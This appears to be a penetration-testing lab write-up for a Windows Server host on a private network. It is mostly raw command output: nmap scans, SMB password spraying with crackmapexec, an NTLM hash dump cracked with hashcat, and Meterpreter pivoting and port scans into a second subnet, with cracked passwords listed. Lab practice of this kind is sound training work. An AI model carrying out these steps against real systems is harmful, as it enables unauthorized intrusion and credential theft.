π₯·WINSERVER3
IP: 192.168.100.55
Nmap Scans
Nmap scan report for ip-192-168-100-55.ap-south-1.compute.internal (192.168.100.55)
Host is up (0.00051s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:E2:1E:D0:78:62 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsNmap scan report for ip-192-168-100-55.ap-south-1.compute.internal (192.168.100.55)
Host is up (0.00052s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
123/udp open|filtered ntp
137/udp open netbios-ns Microsoft Windows netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
3389/udp open|filtered ms-wbt-server
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
MAC Address: 02:F9:2B:6D:C6:06 (Unknown)
Service Info: Host: WINSERVER-03; OS: Windows; CPE: cpe:/o:microsoft:windowsSMB Enumeartion
SMB Version
root@kali:~# crackmapexec rdp 192.168.100.55 -u lawrence -p /root/Desktop/names.txt
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {ssh,winrm,ldap,smb,mssql} ...
crackmapexec: error: argument protocol: invalid choice: 'rdp' (choose from 'ssh', 'winrm', 'ldap', 'smb', 'mssql')
root@kali:~# crackmapexec smb 192.168.100.55 -u lawrence -p /root/Desktop/names.txt
SMB 192.168.100.55 445 WINSERVER-03 [*] Windows Server 2019 Datacenter 17763 x64 (name:WINSERVER-03) (domain:WINSERVER-03) (signing:False) (SMBv1:True)
SMB 192.168.100.55 445 WINSERVER-03 [-] WINSERVER-03\\lawrence:lw9875 STATUS_LOGON_FAILURE
SMB 192.168.100.55 445 WINSERVER-03 [-] WINSERVER-03\\lawrence:blanca STATUS_LOGON_FAILURE
SMB 192.168.100.55 445 WINSERVER-03 [+] WINSERVER-03\\lawrence:computadora
Hashdumping
root@kali:~# vim win3_hashdump
root@kali:~# hashcat -m 1000 -a 0 -O win3_hashdump /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 5843/5907 MB (2048 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27
Hashes: 8 digests; 7 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Precompute-Init
* Meet-In-The-Middle
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
INFO: Removed 1 hash found in potfile.
Host memory required for this attack: 64 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
61fb34469b9989b01be4e8630c52eed6:swordfish
18aa104784f77431563b1a1b67f6096c:computadora
11637a16fca11b3604e3e68d5221b3c7:hotmama
0f2011271b98907e6d288066567d3319:blanca
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: win3_hashdump
Time.Started.....: Mon Aug 19 08:58:27 2024 (11 secs)
Time.Estimated...: Mon Aug 19 08:58:38 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1324.7 kH/s (1.22ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 5/7 (71.43%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 6538/14344385 (0.05%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[213134356173382a] -> $HEX[042a0337c2a156616d6f732103]
s
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: win3_hashdump
Time.Started.....: Mon Aug 19 08:58:27 2024 (11 secs)
Time.Estimated...: Mon Aug 19 08:58:38 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1324.7 kH/s (1.22ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 5/7 (71.43%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 6538/14344385 (0.05%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[213134356173382a] -> $HEX[042a0337c2a156616d6f732103]
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => Started: Mon Aug 19 08:58:26 2024
Stopped: Mon Aug 19 08:58:39 2024
root@kali:~#
root@kali:~#
root@kali:~#
root@kali:~#
root@kali:~#
root@kali:~# cat win3_hashdump
admin:1011:aad3b435b51404eeaad3b435b51404ee:0f2011271b98907e6d288066567d3319:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:61fb34469b9989b01be4e8630c52eed6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lawrence:1009:aad3b435b51404eeaad3b435b51404ee:18aa104784f77431563b1a1b67f6096c:::
mary:1010:aad3b435b51404eeaad3b435b51404ee:11637a16fca11b3604e3e68d5221b3c7:::
student:1008:aad3b435b51404eeaad3b435b51404ee:bd4ca1fbe028f3c5066467a7f6a73b0b:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
root@kali:~#Pivoting
[*] Performing ping sweep for IP range 192.168.0.0/24
[+] 192.168.0.1 host found
[+] 192.168.0.57 host found
[+] 192.168.0.50 host found
[+] 192.168.0.51 host found
[+] 192.168.0.61 host found
Autoroute and scanning
meterpreter > run autoroute -s 192.168.0.0/24
meterpreter > portfwd add -l 1255 -p 80 -r 192.168.0.51
// Some code
meterpreter > run autoroute -s 192.168.0.0/24
meterpreter > portfwd add -l 1255 -p 80 -r 192.168.0.51
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 3389,22,80,10000
PORTS => 3389,22,80,10000
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.0.61: - 192.168.0.61:3389 - TCP OPEN
[*] 192.168.0.61: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.0.2
RHOSTS => 192.168.0.2
msf6 auxiliary(scanner/portscan/tcp) > run
[*] 192.168.0.2: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.0.51
RHOSTS => 192.168.0.51
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.0.51: - 192.168.0.51:80 - TCP OPEN
[+] 192.168.0.51: - 192.168.0.51:3389 - TCP OPEN
[+] 192.168.0.51: - 192.168.0.51:22 - TCP OPEN
[+] 192.168.0.51: - 192.168.0.51:10000 - TCP OPEN
[*] 192.168.0.51: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.0.57
RHOSTS => 192.168.0.57
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.0.57: - 192.168.0.57:22 - TCP OPEN
[*] 192.168.0.57: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > 
webmin server:
Default creds for webmin thats the vulnerability.
Last updated